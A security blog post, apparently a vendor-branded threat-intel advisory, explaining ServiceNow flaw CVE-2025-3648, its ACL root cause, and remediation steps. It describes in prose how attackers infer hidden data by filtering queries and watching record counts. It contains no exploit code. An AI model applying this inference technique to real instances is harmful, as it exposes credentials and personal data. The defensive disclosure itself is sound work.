Author: CyberDudeBivash Powered by: CyberDudeBivash Brand | cyberdudebivash.com Related: cyberbivash.blogspot.com Daily Threat Intel by CyberDudeBivash Zero-days, exploit breakdowns, IOCs, detection rules & mitigation playbooks. Follow on LinkedIn Apps & Security Tools CYBERDUDEBIVASH CYBERDUDEBIVASH PVT LTD WWW.CYBERDUDEBIVASH.COM When Malware Stops Looking the Same Understanding Polymorphic Malware in 2026 & the CyberDudeBivash Countermeasure 5 January 2026 By Bivash Kumar Nayak Founder & Cybersecurity Strategist, CyberDudeBivash Pvt. Ltd. Introduction: The End of Static Malware For years, defenders relied on a simple assumption: malware looks the same every time it spreads. That assumption no longer holds. In 2026, modern malware families rarely reuse identical code. Instead, they continuously mutate their structure while preserving functionality — a technique broadly known as polymorphism . This evolutio...
CyberDudeBivash Intel Report: ServiceNow “Count(er) Strike” Rounds Delivered — CVE-2025-3648 Exposes Your Data By CyberDudeBivash — Cybersecurity Authority
1. Headline Alert
ServiceNow’s Now Platform suffered a high-severity data inference flaw, officially CVE-2025-3648, colloquially dubbed “Count(er) Strike”. This vulnerability enables low-privileged—or even anonymous—users to extract sensitive data via clever UI enumeration of record counts.
Varonis researchers discovered and disclosed the flaw; ServiceNow responded with a May 2025 patch and new ACL frameworks (Xanadu & Yokohama). Despite this, if your ACLs weren’t updated and audited, you’re still at risk.
VaronisOp-CThe Hacker NewsBleepingComputerCIO
2. Technical Breakdown
Root Cause & ACL Flaws
ServiceNow Access Control Lists (ACLs) evaluate four conditions:
-
Required Roles
-
Security Attributes
-
Data Conditions
-
Script Conditions
Under the default “Allow if any” logic, satisfying just one ACL allows access—even if the other three should have blocked access. Worse, if a user fails only the data or script conditions, ServiceNow still shows the record count in the UI, giving attackers enough signals to infer what’s in the table.
VaronisOp-CThe Hacker NewsBleepingComputerAmpcus CyberSecurity Buzz
Enumeration via UI Count Leak
Attackers exploit this by filtering queries (e.g., STARTSWITH, CONTAINS) and observing record count responses, gradually inferring secrets one character or condition at a time—even without seeing the actual data.
VaronisThe Hacker NewsBleepingComputer
3. Impact Snapshots
-
Severity: High (CVSS ~8.2/10)
-
Exposed Data: PII, credentials, internal config—across ITSM, HR, GRC, CSM, etc.
-
Attack Vector: Minimal privileges—anonymous or self-registered accounts suffice.
-
Reach: Every ServiceNow customer using misconfigured ACLs.
VaronisThe Hacker NewsTechRadarAmpcus CyberCIO
CIO.com warned that admins must fix ACLs immediately. Forrester and IDC analysts echoed urgency, labeling it a “high-priority” systemic risk.
CIO
4. ServiceNow’s Defense Measures
ServiceNow delivered fixes in May 2025, introducing new ACL logic:
-
Deny-Unless ACLs — Access is allowed only if all conditions pass.
-
Query ACLs — Controls/improves filtering logic to prevent enumeration attacks.
-
Security Data Filters — Suppress record counts and “rows removed” metadata that facilitate inference.
NVDVaronisOp-CTechRadar
ServiceNow urges admins to review KBs (e.g., KB2139567) and reconfigure tables accordingly.
NVDServiceNow Support
5. CyberDudeBivash Tactical Guidance
Immediate Actions
-
Patch Now — Ensure your instance is updated with May 2025 security patch.
-
Audit All ACLs — Identify tables with weak or empty roles/security attributes and address “Allow if any” pitfalls.
-
Apply New Controls — Deploy Deny-Unless, Query ACLs, and Security Data Filters across sensitive tables.
-
Test Enumeration Risks — Simulate low-permission queries to detect leaks.
-
Lock Down Self-Registration — Restrict or disable if not essential.
Strategic Imperatives
-
Enforce least-privilege posture across the board.
-
Integrate continuous audit of ACL configs.
-
Employ real-time monitoring tools to flag unusual query patterns or metadata leak indicators.
-
Educate admins: “Default deny” is now not optional—it’s mandatory.
6. Summary Table: What You Must Know
| Element | Details |
|---|---|
| CVE ID | CVE-2025-3648 (“Count(er) Strike”) |
| Severity | High (CVSS ~ 8.2) |
| Discovery | Varonis Threat Labs (Feb 2024) |
| Weakness | ACL logic leaking record counts under misconfig with “Allow if any” |
| Impact | Data inference via UI — credentials, PII, config |
| Attack Ease | Very low skill required |
| Fix Released | May 2025 patch + new ACL frameworks (Xanadu, Yokohama) |
| Your Task | Patch, audit ACLs, apply new controls, and monitor |
CyberDudeBivash Executive Verdict
Count(er) Strike is a ticking data time-bomb. Attackers don’t need code execution or admin privileges—they just need to see a count. This is not “could happen someday”—it’s happened already to default-misconfigured environments.
If your ACLs aren’t updated: you are leaking sensitive data. End of story. Act immediately.
#CyberDudeBivash #CVE20253648 #ServiceNow #CountErStrike #DataEnumeration #AccessControl #CyberSecurity #PatchNow #ZeroTrust #ThreatIntel
Further reading on Count(er) Strike
Comments
Post a Comment